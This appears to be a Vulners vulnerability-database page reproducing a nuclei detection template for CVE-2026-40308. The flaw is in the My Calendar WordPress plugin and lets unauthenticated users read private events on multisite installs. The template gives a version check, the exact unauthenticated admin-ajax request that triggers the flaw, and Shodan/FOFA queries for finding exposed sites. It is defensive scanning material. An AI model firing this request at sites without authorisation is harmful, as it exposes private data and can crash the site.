Lucene search
K

My Calendar WordPress Plugin - Information Disclosure

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Unauthenticated users can access private events or crash sites via My Calendar plugin on WordPress multisite.

Related
Refs
Code
id: CVE-2026-40308

info:
  name: My Calendar WordPress Plugin - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by unvalidated user input passed to parse_str() in mc_ajax_mcjs_action endpoint, letting unauthenticated attackers access or crash sites via switch_to_blog(), exploit requires WordPress Multisite or Single Site setup.
  impact: |
    Unauthenticated attackers can access private events on multisite or cause denial of service on single site installations.
  remediation: |
    Update to version 3.7.7 or later.
  reference:
    - https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40308
  classification:
    cve-id: CVE-2026-40308
    epss-score: 0.00932
    epss-percentile: 0.56327
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 2
    vendor: joedolson
    product: my-calendar
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/my-calendar/"
    fofa-query: body="/wp-content/plugins/my-calendar/" && title="WordPress"
  tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "My Calendar"
          - "Stable tag:"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 3.7.6")'
          - 'contains_all(body, "\"success\":1", "response")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210090a9e70c1360f66288256592c59b72c140ffcc35c76ae6c5cee669d2c8cd9a4c022100e861ec703949d38000bd7b06f4b81636135e47c333e590a794536802df2fc944:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation